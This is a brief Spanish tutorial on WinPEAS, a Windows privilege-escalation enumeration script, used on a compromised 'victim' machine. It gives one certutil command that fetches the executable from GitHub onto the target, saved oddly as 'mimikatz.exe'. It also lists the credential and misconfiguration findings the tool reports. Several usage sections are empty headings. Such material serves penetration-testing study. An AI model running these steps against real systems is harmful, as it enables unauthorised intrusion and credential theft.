WinPEAS

Windows Privilege Escalation

WinPEAS (Windows Privilege Escalation Awesome Script) es una herramienta desarrollada por carlos polop como parte de la suite de PEASS-ng (Privilege Escalation Awesome Scripts Suite), siendo su objetivo principal automatizar el proceso de post explotación de encontrar vulnerabilidades y fallas para escalar privilegios en sistemas Windows. WinPEAS emplea técnicas para detectar VMs, archivos sensibles, analizar permisos, analizar servicios, escanear configuraciones débiles, aplicaciones y vectores comunes de escalación. este escaneo se realiza mediante un ejecutable .exe o .bat que se ejecutan en la maquina victima cuando tenemos una intrusión generalmente con privilegios mínimos. Al final de cualquier análisis proporciona un informe general de todo lo encontrado.

que podemos hacer con WinPEAS:

  • Services Misconfiguration

  • Permisos de registro débiles

  • Enumerar archivos sensibles, vulnerables

  • Enumerar información del sistema

  • Procesos con permisos elevados

  • Abuso de Tokens

  • PTH

  • Abuso de Software desactualizado

  • etc

Instalación de WinPEAS

si el equipo comprometido cuenta con medidas de seguridad básicas la detección será rápida pero se pueden utilizar técnicas adicionales para evitar las mismas.

# instalar desde CMD
certutil -urlcache -split -f "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe" mimikatz.exe

Uso de WinPEAS

Ejecución de WinPEAS

desde que ejecutas WinPEAS incia el escaneo

Escaneos específicos

Escaneo Silencioso (Stealth)

estos escaneos se hacen en segundo plano

Análisis del output

cuando WinPEAS termina el escaneo nos indica que vectores de ataques son factibles en el sistema victima, podemos clasificarlos si el output es colorido:

  • INFORMACIÓN CRÍTICA (ROJO/AMARILLO)

    • Servicios con permisos vulnerables

    • Tareas programadas vulnerables

    • Archivos de contraseñas

    • Software desactualizado

    • Configuraciones AlwaysInstallElevated

  • INFORMACIÓN DEL SISTEMA

    • Usuario actual y grupos

    • Privilegios del token

    • Versión de Windows

    • Antivirus instalado

  • CREDENCIALES

    • Archivos posiblemente sensibles

    • Claves de registro con credenciales

    • Historial de navegadores

el objetivo es que analices cada vector para posteriormente explotarlo y escalar privilegios.

Last updated